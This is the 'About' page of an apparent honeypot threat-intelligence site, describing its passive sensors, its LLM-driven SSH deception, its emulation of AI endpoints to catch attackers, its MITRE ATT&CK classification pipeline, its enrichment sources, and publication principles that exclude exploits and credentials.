About

Distributed honeypot sensors capture real attacker behavior across multiple continents. Every session, command, and credential on this site is observed โ€” never simulated.

// HOW IT WORKS

Passive collection onlySensors observe attacker intent, never execution. No exploit payloads are sent. No active scanning is performed.

Sensors run Beelzebub, an open-source honeypot framework. SSH services use LLM-powered interactive responses that convince attackers they have access to a real server โ€” sustaining sessions long enough to capture full attack chains. HTTP services emulate AI infrastructure (Ollama, OpenAI-compatible APIs, MCP endpoints) to catch the wave of attackers now scanning for exposed models and agent gateways.

// PIPELINE

TRAPSensors
โ†’
โ†“
CLASSIFYIntent
โ†’
โ†“
ENRICHThreat Intel
โ†’
โ†“
STOREDatabase
โ†’
โ†“
PUBLISHDashboard

A custom classification engine processes sensor events in real time โ€” commands, credentials, and payloads mapped to MITRE ATT&CK techniques. All classification is deterministic pattern matching. No ML.

// ENRICHMENT

Each session is enriched from multiple external sources before publication:

AbuseIPDBAbuse confidence scoring and automated reporting
GreyNoiseInternet noise classification and benign service identification
VirusTotalIP reputation from 70+ security vendors
MaxMindIP geolocation and ASN attribution

// PRINCIPLES

Evidence over speculationWe show what we captured. When we infer, we say so.
Scoped claimsFour sensors across three continents. Good coverage, not global visibility.
No actor attributionSource IP doesn't equal origin. We describe behavior, not identity.
Publication safetyNo working exploits. No credential pairs. Compromised infrastructure redacted.
Enter Dashboard โ†’View Attack Map โ†’